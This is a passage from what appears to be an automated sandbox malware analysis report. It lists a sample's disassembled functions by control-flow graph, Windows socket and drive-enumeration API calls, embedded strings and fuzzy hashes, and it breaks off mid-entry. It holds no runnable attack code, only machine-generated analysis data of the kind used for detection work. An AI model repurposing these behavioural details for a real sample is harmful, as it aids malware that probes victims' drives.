                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: send
                                                      • String ID: LIMIT %s:%d %s reached memlimit$N=G$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                      • API String ID: 2809346765-821333934
                                                      • Opcode ID: db9c0aa73f2a04e23c88eacde707b2b3121f567ab280ad3eb3f115870b7e8b27
                                                      • Instruction ID: 387308bbbfab1f6b8071f94ba152818b209ab266aa593a280ba1fd7c3efceb95
                                                      • Opcode Fuzzy Hash: db9c0aa73f2a04e23c88eacde707b2b3121f567ab280ad3eb3f115870b7e8b27
                                                      • Instruction Fuzzy Hash: 36113AF1648314BBD5209755BC8AE7B3B9CEBC2B2CF854919FC0C23342E1A69D0182B2
                                                      Function 004A9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1641 4a9290-4a92ed call 4776a0 1644 4a93c3-4a93ce 1641->1644 1645 4a92f3-4a92fb 1641->1645 1654 4a93d0-4a93e1 1644->1654 1655 4a93e5-4a9427 call 48d090 call 4b4f40 1644->1655 1646 4a93aa-4a93af 1645->1646 1647 4a9301-4a9333 call 48d8c0 call 48d9a0 1645->1647 1648 4a9456-4a9470 1646->1648 1649 4a93b5-4a93bc 1646->1649 1666 4a93a7 1647->1666 1667 4a9335-4a9364 WSAIoctl 1647->1667 1652 4a9429-4a9431 1649->1652 1653 4a93be 1649->1653 1660 4a9439-4a943f 1652->1660 1661 4a9433-4a9437 1652->1661 1653->1648 1654->1649 1657 4a93e3 1654->1657 1655->1648 1655->1652 1657->1648 1660->1648 1662 4a9441-4a9453 call 4b50a0 1660->1662 1661->1648 1661->1660 1662->1648 1666->1646 1670 4a939b-4a93a4 1667->1670 1671 4a9366-4a936f 1667->1671 1670->1666 1671->1670 1673 4a9371-4a9390 setsockopt 1671->1673 1673->1670 1674 4a9392-4a9395 1673->1674 1674->1670
                                                      APIs
                                                      • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 004A935C
                                                      • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 004A9389
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1459728015.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                      • Associated: 00000000.00000002.1459707893.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000920000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1459728015.0000000000A85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460147169.0000000000A88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000C14000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000D2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E02000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460162399.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460437376.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460546778.0000000000FD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1460563663.0000000000FDB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_470000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID: Ioctlsetsockopt
                                                      • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                      • API String ID: 1903391676-2691795271
                                                      • Opcode ID: 9ef85573f94f79cda0996b3d7efde408b557a88df296f22e77b133faf3714d05
                                                      • Instruction ID: 017cb31854bd8c36d51f63e89ee3ae3fbeb62ca1168127621cbb7cc85dc37fc2
                                                      • Opcode Fuzzy Hash: 9ef85573f94f79cda0996b3d7efde408b557a88df296f22e77b133faf3714d05
                                                      • Instruction Fuzzy Hash: 8A51D270604305ABEB10DF24C881FAAB7A5FF99318F14852AFD488B382D735ED51CB95
                                                      Function 0710094B Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 493COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1675 710094b-710094c 1676 71008eb-7100905 1675->1676 1677 710094e-7100b8b 1675->1677 1678 7100910 1676->1678 1704 7100b99-7100bca call 7100bd2 1677->1704 1678->1678 1708 7100bcc-7100bcd 1704->1708 1709 7100b8f-7100b97 1704->1709 1710 7100b8d 1708->1710 1711 7100bcf-7100d29 call 7100cbc GetLogicalDrives 1708->1711 1709->1704 1710->1709 1727 7100d35-7100dc9 call 7100dd7 1711->1727 1736 7100e42-7100fa9 1727->1736 1737 7100dcb-7100e3f 1727->1737 1737->1736
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 6e43c92693d363401882f58e88fab1648fe8db708c39aae4ed6309c4ca74c299
                                                      • Instruction ID: d4bb2469b8a51431d9d099888b5e12214fc9812ce9da422e7ef992e571573949
                                                      • Opcode Fuzzy Hash: 6e43c92693d363401882f58e88fab1648fe8db708c39aae4ed6309c4ca74c299
                                                      • Instruction Fuzzy Hash: CBA1BDFB26C121BC710A85452B54BFA6B6EE4CBA30B32847BF807D65C2E3D54B4E51B1
                                                      Function 07100970 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 487COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1757 7100970-7100976 1759 7100936-710096b 1757->1759 1760 7100978-710097a 1757->1760 1762 710097b-7100b8b 1759->1762 1760->1762 1787 7100b99-7100bca call 7100bd2 1762->1787 1791 7100bcc-7100bcd 1787->1791 1792 7100b8f-7100b97 1787->1792 1793 7100b8d 1791->1793 1794 7100bcf-7100d29 call 7100cbc GetLogicalDrives 1791->1794 1792->1787 1793->1792 1810 7100d35-7100dc9 call 7100dd7 1794->1810 1819 7100e42-7100fa9 1810->1819 1820 7100dcb-7100e3f 1810->1820 1820->1819
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 85f618f1b21b7367246148cd9b2a790e4ad64626d596ea1ee3fbdb68d5de62f0
                                                      • Instruction ID: d1d921ff6573ea74b9a3a139050bd43f9c87b385bd471736030160197f60c054
                                                      • Opcode Fuzzy Hash: 85f618f1b21b7367246148cd9b2a790e4ad64626d596ea1ee3fbdb68d5de62f0
                                                      • Instruction Fuzzy Hash: F5A1BEFB26C121BC710A85552B54BFB6B6EE4CBA30B32842BF807D65C2E3D54B4E51B1
                                                      Function 07100932 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 481COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1920 7100932-7100b8b 1948 7100b99-7100bca call 7100bd2 1920->1948 1952 7100bcc-7100bcd 1948->1952 1953 7100b8f-7100b97 1948->1953 1954 7100b8d 1952->1954 1955 7100bcf-7100d29 call 7100cbc GetLogicalDrives 1952->1955 1953->1948 1954->1953 1971 7100d35-7100dc9 call 7100dd7 1955->1971 1980 7100e42-7100fa9 1971->1980 1981 7100dcb-7100e3f 1971->1981 1981->1980
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 50168b4875a73d306e548dc6c33a86d7198394a38f86e8bffdcc64d242bc3732
                                                      • Instruction ID: 5221b2f444a6436384b2f4fb356e11eb9e0e7b8b886aaf51e90cfeb39567a2ee
                                                      • Opcode Fuzzy Hash: 50168b4875a73d306e548dc6c33a86d7198394a38f86e8bffdcc64d242bc3732
                                                      • Instruction Fuzzy Hash: 7491BEFB26C121BC710685552B54BFA6B6EE4CBA30B32842BF807D65C2E3D54B4E51B1
                                                      Function 07100928 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 481COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1840 7100928-7100b8b 1867 7100b99-7100bca call 7100bd2 1840->1867 1871 7100bcc-7100bcd 1867->1871 1872 7100b8f-7100b97 1867->1872 1873 7100b8d 1871->1873 1874 7100bcf-7100d29 call 7100cbc GetLogicalDrives 1871->1874 1872->1867 1873->1872 1890 7100d35-7100dc9 call 7100dd7 1874->1890 1899 7100e42-7100fa9 1890->1899 1900 7100dcb-7100e3f 1890->1900 1900->1899
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: e3650ec9fe1d5821c13d44547b6aaf2246d94bca801f49baefe6a7964737509a
                                                      • Instruction ID: 2086924f84507d4ca273dab1dbb94332fb59891fa64bc7dbf5d5ba7da437a916
                                                      • Opcode Fuzzy Hash: e3650ec9fe1d5821c13d44547b6aaf2246d94bca801f49baefe6a7964737509a
                                                      • Instruction Fuzzy Hash: 1291DDFB26C121BC710A85552B54BFA6B6EE4CBB30B32842BF807D65C2E3D54B4E51B1
                                                      Function 07100956 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 479COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2001 7100956-7100b8b 2026 7100b99-7100bca call 7100bd2 2001->2026 2030 7100bcc-7100bcd 2026->2030 2031 7100b8f-7100b97 2026->2031 2032 7100b8d 2030->2032 2033 7100bcf-7100d29 call 7100cbc GetLogicalDrives 2030->2033 2031->2026 2032->2031 2049 7100d35-7100dc9 call 7100dd7 2033->2049 2058 7100e42-7100fa9 2049->2058 2059 7100dcb-7100e3f 2049->2059 2059->2058
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 2a5a40e44050e99dcc38366f0aca96eba7e25b4e967f900e0fb9cca2ea637274
                                                      • Instruction ID: 3aacfca32ab59c7f46d1c516d8aeaa74b93129b1f26443408141bf574dbb1522
                                                      • Opcode Fuzzy Hash: 2a5a40e44050e99dcc38366f0aca96eba7e25b4e967f900e0fb9cca2ea637274
                                                      • Instruction Fuzzy Hash: 2191CCFB26C121BCB10685452B54BFA6B6EE5CBA30B32842BF807D65C2E3D54B4E51B1
                                                      Function 0710098C Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 458COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2079 710098c-7100b8b 2101 7100b99-7100bca call 7100bd2 2079->2101 2105 7100bcc-7100bcd 2101->2105 2106 7100b8f-7100b97 2101->2106 2107 7100b8d 2105->2107 2108 7100bcf-7100d29 call 7100cbc GetLogicalDrives 2105->2108 2106->2101 2107->2106 2124 7100d35-7100dc9 call 7100dd7 2108->2124 2133 7100e42-7100fa9 2124->2133 2134 7100dcb-7100e3f 2124->2134 2134->2133
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: dcdc6ef8f3639dbca47984e29930fb0c2ff9c4b714a8a95681d8273c2b2745d4
                                                      • Instruction ID: 092525337728d9828fb40d4ae7d9dbebde9866f3d77988b3c5f51f19cb29a7c0
                                                      • Opcode Fuzzy Hash: dcdc6ef8f3639dbca47984e29930fb0c2ff9c4b714a8a95681d8273c2b2745d4
                                                      • Instruction Fuzzy Hash: 2891DDFB26C121BC710A85552B54BFA6B6EE4CBB30B32842BF807D65C2E3D54B4E51B1
                                                      Function 0710099B Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 455COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2154 710099b-7100b8b 2174 7100b99-7100bca call 7100bd2 2154->2174 2178 7100bcc-7100bcd 2174->2178 2179 7100b8f-7100b97 2174->2179 2180 7100b8d 2178->2180 2181 7100bcf-7100d29 call 7100cbc GetLogicalDrives 2178->2181 2179->2174 2180->2179 2197 7100d35-7100dc9 call 7100dd7 2181->2197 2206 7100e42-7100fa9 2197->2206 2207 7100dcb-7100e3f 2197->2207 2207->2206
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 9b72d2db765a277fad53ef52cc240307d4fd7bdb6e5706df4d7be447cf70912c
                                                      • Instruction ID: 46d843135bb7b91298280ea63cef4717a1081e551ab3ed96eed93ab7d66fbabe
                                                      • Opcode Fuzzy Hash: 9b72d2db765a277fad53ef52cc240307d4fd7bdb6e5706df4d7be447cf70912c
                                                      • Instruction Fuzzy Hash: 5491F0FB16C121BCA20685552B54BFA6B6EE4CBB30732847BF403D65C2E3D54B4E51B1
                                                      Function 07100A5D Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 450COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 381d65168aeae369ebb67e1aa1c283b30c6bebe2f97de343958d1edc48416c01
                                                      • Instruction ID: 1be9a4ba618b3475ef33e83271f6ea0e1d5488ac2ee811484025b22210f66903
                                                      • Opcode Fuzzy Hash: 381d65168aeae369ebb67e1aa1c283b30c6bebe2f97de343958d1edc48416c01
                                                      • Instruction Fuzzy Hash: 7C9133FB16C121BCA20685552B54BFA6B7EE4CBA30732846BF803D65C2E3D54B4E52B1
                                                      Function 071009D3 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 441COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 6bfa3541ff8f5ad96bb28bac22eccc678478bfd08c689be2061fae0e96e9acee
                                                      • Instruction ID: 997780627db090d6a3941129b3dfcdd1b80d4b54357fe9e7e3ed250a1d9821d3
                                                      • Opcode Fuzzy Hash: 6bfa3541ff8f5ad96bb28bac22eccc678478bfd08c689be2061fae0e96e9acee
                                                      • Instruction Fuzzy Hash: AF91DEFB16C121BC610685552B54BFA6B6EE4CBA30B32843BF807D65C2E3D54B4E51B1
                                                      Function 071009E3 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 435COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: a332827597081def19659d2c5442bcaec93ffe074df4eda7ffd7364f4f39ea2f
                                                      • Instruction ID: 4b546eb94632526c1b5d956ddab42aca3fdb78def8b4ee07f2ca6c747f6b5dba
                                                      • Opcode Fuzzy Hash: a332827597081def19659d2c5442bcaec93ffe074df4eda7ffd7364f4f39ea2f
                                                      • Instruction Fuzzy Hash: 2781FEFB16C121BCA10685552B54BFA6B6EE4CBA30B32843BF803D65C2E3D54B4E51B1
                                                      Function 07100A7A Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 430COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 8119488ad575bdf980c714ee4ab79cc1e5d6c3bb8fd725fcec55f34a23ab3840
                                                      • Instruction ID: 65ba14d8e6c21c9e3d78e0995e381e7ae336920dd96f3b555db387e445943546
                                                      • Opcode Fuzzy Hash: 8119488ad575bdf980c714ee4ab79cc1e5d6c3bb8fd725fcec55f34a23ab3840
                                                      • Instruction Fuzzy Hash: D681F0FB16C121BCA20685952B54BFA6B6EE4CBB30732843BF807D65C2E3D54B4E51B1
                                                      Function 07100A07 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 426COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 61137a55e009701cfb4fb689c8089e8e58f243da1c755da8937ff0299737b685
                                                      • Instruction ID: 4bca7f71f35b59d5a0ce53d0bf31a6e6ecae8bd4750428b75865baa606ce61f3
                                                      • Opcode Fuzzy Hash: 61137a55e009701cfb4fb689c8089e8e58f243da1c755da8937ff0299737b685
                                                      • Instruction Fuzzy Hash: 8681FFFB16C121BCA10A85452B54BFA6B6EE4CBB30B32843BF807D65C2E3D54B4E51B1
                                                      Function 07100A15 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 423COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 2e9cf6ee128fd89e01546793f667608ac507bd8acd09bf60ef3ed5d240d0ec15
                                                      • Instruction ID: e8163aa5fb13a92d5b037eeba51d403104fd89428c67c53b5c39f14d46290d22
                                                      • Opcode Fuzzy Hash: 2e9cf6ee128fd89e01546793f667608ac507bd8acd09bf60ef3ed5d240d0ec15
                                                      • Instruction Fuzzy Hash: 768101FB16C121BD610681952B54BFA6B6EE4CBB30B32843BF803D65C2E3D54B4E51B1
                                                      Function 07100A41 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 420COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 287dc164d79f65b2b0448392379440a9fde6803c7a97743b6c4d8088d55d6547
                                                      • Instruction ID: 073769a86e89d2569fd54c595e7d376eca1f6d90ceff4cb7a0ac3d6d3572ef5b
                                                      • Opcode Fuzzy Hash: 287dc164d79f65b2b0448392379440a9fde6803c7a97743b6c4d8088d55d6547
                                                      • Instruction Fuzzy Hash: 89810EFB16C121BCA10685952B54BFA6B7EE4CBA30732847BF803D65C2E3D54B4E52B1
                                                      Function 07100AA1 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 418COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: abbd933567906427c0e26311f328998b040a2b0c213adc7ee47abec3eb3c2b7e
                                                      • Instruction ID: e1c31c373ccfbb852491f950c36c17bad7c211f7ef8207a82fac7d68035efca6
                                                      • Opcode Fuzzy Hash: abbd933567906427c0e26311f328998b040a2b0c213adc7ee47abec3eb3c2b7e
                                                      • Instruction Fuzzy Hash: A281FEFB26C121BCA10685952B54BFA6B7EE4CBB30732846BF403D65C2E3D54B4E51B1
                                                      Function 07100A2D Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 416COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 802472ddd887f5d6b3e399cc712d32986bdb440d7cf4ce51a8001691b63691cd
                                                      • Instruction ID: 4b2a78ffabdd73aab028ecf275a19e6826df7c3cd07b13f6fdc129dc08598924
                                                      • Opcode Fuzzy Hash: 802472ddd887f5d6b3e399cc712d32986bdb440d7cf4ce51a8001691b63691cd
                                                      • Instruction Fuzzy Hash: AA81FFFB16C121BCA10685452B54BFA6B7EE4CBB30B32842BF807D65C2E3D54B4E51B1
                                                      Function 07100AB9 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 410COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: 3031f9c56e3fbe46df205d567032af55ffbe92ef52ee09092369c60580ba3993
                                                      • Instruction ID: eb649aa7395b0f033ba3ff8a38bca5c25523795c27e1c750a1e03b43318478e5
                                                      • Opcode Fuzzy Hash: 3031f9c56e3fbe46df205d567032af55ffbe92ef52ee09092369c60580ba3993
                                                      • Instruction Fuzzy Hash: 4C8131FB26C121BCA20681552B54BFA6B7EE4CB630732847BF403C65C2E3D54B4E52B1
                                                      Function 07100A90 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 401COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: abb121d6977a3123253415dc8d2e5123b9357d27e3ccb191694f192cc3aed54f
                                                      • Instruction ID: bdf7990926e5d740c872f7897d0dc7aa6912f355ce37f3b78f768132616888a1
                                                      • Opcode Fuzzy Hash: abb121d6977a3123253415dc8d2e5123b9357d27e3ccb191694f192cc3aed54f
                                                      • Instruction Fuzzy Hash: 1F81EDFB16C121BDA10685852B54BFA6B6EE4CBB30732847BF803D65C2E3D54B4E61B1
                                                      Function 07100AEF Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 384COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: f3422b2ed13e1b496da2a14d8951518db912825e2931e856a5b7325f4dd50aba
                                                      • Instruction ID: 10d1394177990510249e4207a1210d45fb9afc03cd7e7f0839000a26c7470481
                                                      • Opcode Fuzzy Hash: f3422b2ed13e1b496da2a14d8951518db912825e2931e856a5b7325f4dd50aba
                                                      • Instruction Fuzzy Hash: 9471EDFB16C121BCA20685952B54BFA6B7EE4CB630732847BF403D65C2E3D54B4E62B1
                                                      Function 07100B03 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1462428912.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7100000_wlEp68Few5.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: A:\$A:\$`BJ^
                                                      • API String ID: 0-246913015
                                                      • Opcode ID: e7a66cfad03ff5b62d21242f85fd9b6bb33a32249d73f237e268671698e5acca
